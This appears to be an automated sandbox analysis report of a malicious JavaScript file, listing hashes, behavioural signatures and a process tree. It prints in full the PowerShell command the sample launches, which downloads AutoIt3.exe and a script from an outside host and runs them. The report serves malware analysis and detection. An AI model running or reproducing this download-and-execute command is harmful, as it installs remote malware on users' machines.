Analysis
  max time kernel: 119s
  max time network: 123s
  platform: windows7_x64
  resource: win7-20231023-en
  resource tags: arch:x64, arch:x86, image:win7-20231023-en, locale:en-us, os:windows7-x64, system
  submitted: 30-10-2023 16:20

Static task: static1

Behavioral task: behavioral1
  Sample: 31102023_0019_fla.js
  Resource: win7-20231023-en
  4 signatures, 150 seconds
General
  Target: 31102023_0019_fla.js
  Size: 135KB
  MD5: 607c2a744dff9a9724c4633a33a90237
  SHA1: 0e0a43c6eed546e7e3f3b103dc78d3d898276481
  SHA256: a4218e196e98797cf2723e653eac563d824d089df0587e39c3a27ae153ef972b
  SHA512: 17536531685491f87e9179587f7c368c937625582ae08be3e4a8d4f1a0ece33339095daaeeba1ce4b6201f0e125539f1bad815c13f12d90fead96da8ef897b69
  SSDEEP: 1536:BZUTSCM9Cfq7u02PmUVdGXjXl4xc5KTPBoMqS7j8frPWgtZPnCUQrNgZnFFQE/0J:0T9U7hgaX6eerjqlI2IO6Mzqfh
  Score: 3/10

Malware Config

Signatures
  Enumerates physical storage devices (1 TTPs)
    Attempts to interact with connected storage/optical drive(s).

  Suspicious behavior: EnumeratesProcesses (1 IoCs)
    Processes:
      pid   Process
      1696  powershell.exe

  Suspicious use of AdjustPrivilegeToken (1 IoCs)
    Processes:
      description              pid   Process
      Token: SeDebugPrivilege  1696  powershell.exe

  Suspicious use of WriteProcessMemory (3 IoCs)
    Processes:
      description                       pid   Process      procid_target
      PID 1136 wrote to memory of 1696  1136  wscript.exe  28
      PID 1136 wrote to memory of 1696  1136  wscript.exe  28
      PID 1136 wrote to memory of 1696  1136  wscript.exe  28
Processes
  C:\Windows\system32\wscript.exe
    Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\31102023_0019_fla.js
    PID: 1136
    Signatures: Suspicious use of WriteProcessMemory
    Child process:
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://sftp.noheroway.com:443' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://sftp.noheroway.com:443/msiydguxwlx' -OutFile 'ydguxwlx.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'ydguxwlx.au3'"
        PID: 1696
        Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken